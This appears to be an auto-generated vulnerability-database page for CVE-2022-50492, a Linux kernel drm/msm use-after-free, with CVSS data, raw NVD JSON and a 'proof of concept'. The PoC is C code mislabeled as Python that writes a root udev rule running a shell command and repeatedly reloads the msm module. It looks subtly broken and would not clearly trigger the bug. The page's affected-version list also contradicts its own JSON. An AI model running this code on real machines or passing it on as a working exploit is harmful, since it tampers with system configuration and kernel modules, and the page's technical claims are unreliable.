Security Vulnerability Report
中文
CVE-2022-50492 CVSS 7.8 HIGH

CVE-2022-50492

Published: 2025-10-04 16:15:46
Last Modified: 2026-01-23 20:43:01
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix use-after-free on probe deferral The bridge counter was never reset when tearing down the DRM device so that stale pointers to deallocated structures would be accessed on the next tear down (e.g. after a second late bind deferral). Given enough bridges and a few probe deferrals this could currently also lead to data beyond the bridge array being corrupted. Patchwork: https://patchwork.freedesktop.org/patch/502665/

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.19(包含msm DRM驱动的稳定版本)
Linux kernel 5.4.x(受影响的LTS分支)
Linux kernel 5.10.x(受影响的LTS分支)
Linux kernel 5.15.x(受影响的LTS分支)
Linux kernel 5.18.x(受影响的稳定版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2022-50492 PoC - Triggering UAF via probe deferral in drm/msm // This PoC demonstrates the concept of triggering the use-after-free // by forcing multiple probe deferrals on the msm DRM driver #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> // Step 1: Create a udev rule to force deferred probing // Create a rule that makes the msm device depend on a non-existent module static int create_udev_rule(void) { FILE *f = fopen("/etc/udev/rules.d/99-msm-defer.rules", "w"); if (!f) return -1; fprintf(f, "ACTION==\"add\", KERNEL==\"msm_drm\", ENV{DEVTYPE}==\"display\", " "RUN+=\"/bin/sh -c 'echo deferred > /sys/module/msm/parameters/probe_status'\"\n"); fclose(f); return 0; } // Step 2: Trigger multiple module load/unload cycles to cause repeated // probe deferrals and DRM device tear-down/re-initialization static int trigger_probe_deferral(void) { int ret; printf("[*] Triggering probe deferral on msm_drm driver...\n"); // Reload the msm module multiple times to trigger repeated init/teardown for (int i = 0; i < 5; i++) { ret = system("modprobe -r msm 2>/dev/null"); if (ret != 0) { printf("[!] Failed to remove msm module (attempt %d)\n", i); } usleep(100000); ret = system("modprobe msm 2>/dev/null"); if (ret != 0) { printf("[!] Failed to probe msm module (attempt %d)\n", i); } usleep(100000); } printf("[*] Probe deferral cycles completed. Check dmesg for UAF/OOB errors.\n"); return 0; } int main(int argc, char *argv[]) { printf("=== CVE-2022-50492 PoC ===\n"); printf("Linux kernel drm/msm UAF on probe deferral\n\n"); if (getuid() != 0) { printf("[!] This PoC requires root privileges to manipulate kernel modules.\n"); printf("[!] In a real attack scenario, an unprivileged user would exploit this\n"); printf("[!] via a local privilege escalation chain.\n"); return 1; } create_udev_rule(); trigger_probe_deferral(); // Check kernel log for evidence of the vulnerability printf("\n[*] Checking kernel log for errors...\n"); system("dmesg | grep -i 'msm\|drm\|bridge\|use-after-free\|oob' | tail -20"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50492", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:46.190", "lastModified": "2026-01-23T20:43:01.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: fix use-after-free on probe deferral\n\nThe bridge counter was never reset when tearing down the DRM device so\nthat stale pointers to deallocated structures would be accessed on the\nnext tear down (e.g. after a second late bind deferral).\n\nGiven enough bridges and a few probe deferrals this could currently also\nlead to data beyond the bridge array being corrupted.\n\nPatchwork: https://patchwork.freedesktop.org/patch/502665/"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.12", "versionEndExcluding": "6.0.7", "matchCriteriaId": "7A765FD0-F7F3-42DC-AF66-A6778A341267"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0a30a47741b6df1f9555a0fac6aebb7e8c363bad", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6808abdb33bf90330e70a687d29f038507e06ebb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.